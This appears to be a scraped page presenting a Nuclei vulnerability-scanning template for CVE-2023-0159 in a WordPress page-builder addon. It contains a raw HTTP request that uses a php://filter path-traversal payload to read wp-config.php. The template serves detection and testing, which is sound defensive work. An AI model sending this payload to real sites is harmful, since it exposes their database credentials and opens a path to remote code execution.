this template is not found in nuclei-templates. CVE-2023-0159
Nuclei Template:
id: CVE-2023-0159
info:
name: Extensive VC Addons for WPBakery page builder < 1.9.1 - Unauthenticated RCE
description: |
"The plugin does not validate a parameter passed to the php extract function when loading templates, allowing an unauthenticated attacker to override the template path to read arbitrary files from the hosts file system. This may be escalated to RCE using PHP filter chains"
author: c4sper0
severity: Critical
tags: wordpress,WPBakery,plugin
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
cvss-score: 10
reference: |
- https://wpscan.com/vulnerability/239ea870-66e5-4754-952e-74d4dd60b809/
http:
- raw:
- |
POST /wp-admin/admin-ajax.php HTTP/2
Host: {{Hostname}}
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 124
action=extensive_vc_init_shortcode_pagination&options[template]=php://filter/convert.base64-encode/resource=../wp-config.php
matchers-condition: and
matchers:
- type: word
part: body
words:
- '{"status":"success","message":"Items are loaded","data":'
- type: status
status:
- 200
Description
The plugin does not validate a parameter passed to the php extract function when loading templates, allowing an unauthenticated attacker to override the template path to read arbitrary files from the hosts file system. This may be escalated to RCE using PHP filter chains.
Template Information:
this template is not found in nuclei-templates. CVE-2023-0159
Nuclei Template:
Description The plugin does not validate a parameter passed to the php extract function when loading templates, allowing an unauthenticated attacker to override the template path to read arbitrary files from the hosts file system. This may be escalated to RCE using PHP filter chains.